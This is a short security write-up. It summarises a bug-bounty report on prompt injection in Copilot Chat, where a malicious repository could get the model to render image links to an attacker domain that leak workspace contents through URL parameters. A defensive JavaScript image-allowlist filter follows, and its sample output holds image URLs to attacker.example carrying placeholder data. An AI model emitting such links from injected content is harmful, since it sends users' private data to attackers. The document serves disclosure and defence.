Because Copilot client interfaces handled output insecurely, an attack initiated by prompt injection could result in data exfiltration in a number of ways. A user who was prompt injected, by running Copilot Chat in a specific manner on an untrusted repository, could have had arbitrary image links pointing to an attacker-controlled domain generated and rendered in the Copilot Chat interface, allowing data exfiltration via URL parameters. This attack could potentially have allowed a compromised Copilot session (Copilot Chat being called on a malicious cloned local repository) to exfiltrate the contents of the same workspace to the malicious domain.
https://hackerone.com/reports/2383092
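
One way a chat client can close the image-rendering path described above, as an added example that is not code from GitHub or from the report: model output is filtered before rendering so that only images from allowlisted hosts are ever fetched. The allowlist host, the function names and the sample output are assumptions constructed for illustration, and reference-style markdown images are not covered.

```javascript
// Assumed allowlist: the only hosts this hypothetical client may load images from.
const ALLOWED_IMAGE_HOSTS = new Set(["avatars.example-cdn.test"]);

// True only for https URLs whose exact hostname is on the allowlist.
function isAllowedImageUrl(rawUrl, allowedHosts = ALLOWED_IMAGE_HOSTS) {
  let url;
  try {
    url = new URL(rawUrl.trim());
  } catch {
    return false; // relative, malformed or scheme-less: never fetch
  }
  return url.protocol === "https:" && allowedHosts.has(url.hostname);
}

// Inline markdown images: ![alt](url "title")
const MD_IMAGE = /!\[([^\]]*)\]\(\s*<?([^\s)>]+)>?[^)]*\)/g;
// Raw HTML images, which many markdown renderers pass through.
const HTML_IMAGE = /<img\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)[^>]*>/gi;

// Replace images the client must not fetch with inert text and report them,
// so the blocked URLs can be logged as a prompt-injection signal.
function neutralizeUntrustedImages(modelOutput, allowedHosts = ALLOWED_IMAGE_HOSTS) {
  const blocked = [];
  const check = (match, alt, url) => {
    if (isAllowedImageUrl(url, allowedHosts)) return match;
    blocked.push(url);
    return `[image blocked: ${alt || "no alt text"}]`;
  };
  const safe = modelOutput
    .replace(MD_IMAGE, (m, alt, url) => check(m, alt, url))
    .replace(HTML_IMAGE, (m, url) => check(m, "", url));
  return { safe, blocked };
}

// Constructed sample of model output; all hosts and values are placeholders.
const SAMPLE_OUTPUT = [
  "Here is the summary you asked for.",
  "![status](https://attacker.example/pixel.png?d=CONSTRUCTED_DATA)",
  '<img src="https://attacker.example/p.gif?d=CONSTRUCTED_DATA">',
  "![avatar](https://avatars.example-cdn.test/u/1.png)",
].join("\n");

const result = neutralizeUntrustedImages(SAMPLE_OUTPUT);
console.log(result.safe);
console.log("blocked:", result.blocked);
```

A filter like this is best paired with a Content-Security-Policy `img-src` restriction in the rendering surface, so that an image form the regexes miss still cannot be fetched.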